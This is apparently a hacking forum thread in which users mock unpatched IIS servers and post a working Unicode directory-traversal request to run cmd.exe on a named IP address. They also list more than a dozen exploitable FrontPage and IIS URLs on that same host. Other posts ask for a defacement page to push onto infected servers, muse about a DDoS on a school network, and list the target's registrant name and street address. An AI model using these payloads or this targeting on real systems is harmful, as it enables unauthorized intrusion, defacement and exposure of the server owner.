Printable View
I finally figured out why all these school website get hacked everyday.. The have at least 20-30 IIS exploits each... I found one (216.247.78.24) that lets you execute arbitary code ont heir system... Just conncect to port 80 and send this command:
Its pathetic... Im informing them of these exploits today :D I can barely contain myself;)Code:GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe
So most IIS web servers have exploits? Tell me it ain't true. No. That can't be.......enoguh sarcasm?
I've trapped about 200 code-red and Nimda infected servers in my tarpit. You'd think when the performance of their web servers degrades enough that they would wake up and figure out that they are infected but NOOOOOOO.
does anybody know of an ftp site that has a good defacement page that can be transfered to these turkeys?
Something like "this site is infected with the nimda virus...stay away!
thank you.
the center for disease control"
It might be the only way to get through to them.
Ill look into that for you Tedob1... But for now check out the rest of the exploits I found on this server.. BTW This site has been hacked during the time we were posting to this thread....I think...lol(216.247.78.24)All the 'bugs' are for port 80 unless otherwise stated.... If you need any help using them.... Dont ask.. Look around or just look up :rolleyes:
---DISCLAIMER---I am NOT responsible for what you do with these bugs---DISCLAIMER---
http://216.247.78.24/_vti_inf.html
http://216.247.78.24/_vti_log
http://216.247.78.24/_vti_log/author.log
http://216.247.78.24/global.asa
http://216.247.78.24/postinfo.html
http://216.247.78.24/cgi-bin
http://216.247.78.24/_vti_bin
http://216.247.78.24/_vti_bin/..%c0%...2/ipconfig.exe
http://216.247.78.24/_vti_bin/_vti_adm/admin.dll
http://216.247.78.24/_vti_bin/_vti_aut/author.dll
http://216.247.78.24/_vti_bin/shtml.dll
http://216.247.78.24/_vti_bin/shtml.dll/_vti_rpc
http://216.247.78.24/_vti_bin/shtml.dll/guest.htm
http://216.247.78.24/_vti_bin/shtml.dll/nosuch.htm
http://216.247.78.24/_vti_bin/shtml.dll/tstt.htm
:D
lol, that is so horrible.
Pathetic isnt it.... Just shows you what Micro$oft is capable of :D
I especially like the ipconfig bug... Look at how many ips the box is bounded to... LOL One Kiddiot could take down the whole k12.us network with a well-orginized DDoS attack....
and someone hacked it, u shouldn't of listed all taht here:( but, that was one of my 1st hacks(not that site it was a Jr High in Canada i think).....
your right about the hole, but its not its not a school.
Man these guys are so lame i could use my own ftp server and get away with it.
if i were inclined to do such things.
24.78.247.216.in-addr.arpa PTR (Pointer) cmsspeedtoys.com
Registrant:
Speedtoys (CMSSPEEDTOYS-DOM)
20 CHERRY LANE
MAHOPAC, NY 10541
US
Ping Results: 216.247.78.24 210 ms (id= 1, seq= 1)
IIS Status : Traversal Unpatched Worm Infected CodeRed
Error Enumerating Shares. The operation completed successfully.
oh ****! i just saw your post with the disclaimer